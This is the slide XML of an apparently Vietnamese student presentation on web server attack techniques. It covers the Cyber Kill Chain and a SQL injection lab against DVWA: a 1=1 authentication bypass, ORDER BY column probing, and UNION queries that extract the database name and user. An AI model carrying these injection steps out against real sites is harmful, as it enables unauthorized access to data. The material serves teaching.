              <a:rPr lang="en-US" sz="6300" dirty="0"/>
              <a:t>CÁC KỸ THUẬT TẤN CÔNG WEBSERVER</a:t>
            </a:r>
            <a:endParaRPr sz="6300"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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611659" y="3529218"/>
            <a:ext cx="3960341" cy="1227259"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="97790" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="770"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sinh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>viên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="770"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Huỳnh Quốc Huy - DTH225650</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="770"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Bùi Nguyễn Minh Huy - DTH225647</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="3510624"/>
            <a:ext cx="3960341" cy="816890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="97790" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="770"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Giảng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>viên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hướng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dẫn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="770"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Ts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Lê</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Hoàng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Anh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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B1FF-5601-31C9-6D2D-DC93F9D7E83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C436EA-0905-97C3-79A5-E96B02880E06}"/>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C5E9E11F-BEF8-75BD-1872-849CB11F334F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8836660" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>1.2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Vòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>đời</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> (Cyber Kill Chain)</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AF3DDBFA-9655-B67B-60A9-32631A2461A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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E250B81-7343-ADCA-87E8-60981C3C6B85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432486" y="1871816"/>
            <a:ext cx="502666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Mô hình này mô tả con đường kẻ tấn công đi qua một cách rất hệ thống để thực hiện một cuộc tấn công.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3886087B-D973-0939-4589-9A78A6E40B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5913704" y="1640867"/>
            <a:ext cx="2797810" cy="3112770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18584025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318C0-7B83-B8CB-12C7-9480D71C408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45A7217-7646-EF0E-9749-0393785E943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0B0F6ED1-6DD5-9161-AD74-B2287021CF1E}"/>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CD9029E2-3D2D-4F17-B23E-09C703327B2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100</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFE066AB-78DA-0ABA-BE1A-C4710194EE9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="671604"/>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Vì mệnh đề 1=1 luôn đúng , việc vượt qua xác thực bypass xảy ra khi kiểm tra password được comment bởi dấu  -- - và vượt qua cả việc trim dữ liệu truyền vào nên server sẽ phản hồi toàn bộ các use</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CFE5C8B-0AC6-B944-C3F0-AABF0A96AEB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2552700"/>
            <a:ext cx="7421091" cy="3298463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29491910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5920A-CC39-86A3-15A4-FEC69A9783C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7FCF15D-D183-D16A-FAEE-5AAAA6D8CB11}"/>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B89770F-5D2D-1036-53DD-264305C83C84}"/>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07E5F34B-3DA5-4E00-5722-4AD3CF8B48F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101</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D239541E-0138-EC03-521F-ACC8D516FDF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="671604"/>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Có thể đoán được câu lệnh SQL hệ thống sử dụng như sau:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SELECT Firstname,Surname FROM users WHERE userid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>= ‘payload’</a:t>
            </a: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Dự</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>đoán</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>số</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cột</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> 2:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDEAFDBB-9748-6FA1-2A58-3E2C5043B9A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1186684" y="2826078"/>
            <a:ext cx="6770631" cy="2497087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3051471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BB64D-6A5C-35E1-94D7-6910418B67B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2696387-B50C-8E13-C51F-1A5D17F9A3A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CD687901-ABE2-D605-71B7-F47AD4CF81AD}"/>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F366A2A6-F29E-F147-898D-095D26E47C3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102</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27098630-74D5-911E-C78C-43CFDA47F8BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="671604"/>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Lệnh không báo lỗi ở ORDER BY 2, ta tiếp tục thử ở ORDER BY 3 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95E2517E-DAAA-B071-CC91-80EB55CE22CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="149714" y="2243768"/>
            <a:ext cx="8844571" cy="2317383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17200467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61171-7AF3-4D23-69C1-DD9264E9118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1854EA8-5986-9DC9-1F97-2254FBBC1F2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2CC569B-5323-4673-4005-94F2B22C47CE}"/>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D01CDABC-4CFF-222B-BFE0-7450E33DEB7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103</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE4DC63C-E315-74EF-E7DF-6AFEDF32272F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="671604"/>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Sử dụng UNION  để trích xuất tên database. Kết quả nhận  thấy database có tên dvwa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE2907A-05A2-E3B0-8E66-DC022AAE4B8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="953851" y="2159425"/>
            <a:ext cx="7236298" cy="3292027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{059CDB60-A0EA-4235-EAB7-51F33CB9DFF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="904875" y="1701156"/>
            <a:ext cx="7351302" cy="458263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39800193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EFA67-ED3B-072F-5BE8-7593BDE7EA6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F9C0941-2C8A-DFBF-0FF0-BFACC3BDC6C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3BDE3946-2A4F-D6C4-2B6C-821A77D76E3D}"/>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CC3AD77B-0863-D02C-52B9-6ACBB7E6021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104</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010EB5A8-9197-F98E-70DD-52E0FAD6E3CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="671604"/>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Tiếp tục với UNION ta trích xuất thông tin user. Kết quả nhận được user là </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>root@localhot </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7486F6DC-C649-E136-69B4-1C11320E5B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="937826" y="2101807"/>
            <a:ext cx="7289518" cy="3418208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCBDC6BC-6B79-2219-930C-1345AD66F4C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1615113"/>
            <a:ext cx="5638800" cy="463010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34649723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233F0-A3C0-37EB-570E-07FC7D22045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B1CD31E-0906-2FBC-17C0-708101A518E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095258F1-CFDF-A510-4B25-099F28431C18}"/>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371F4CA8-6DEE-FFE4-049F-6E23E84D771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105</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
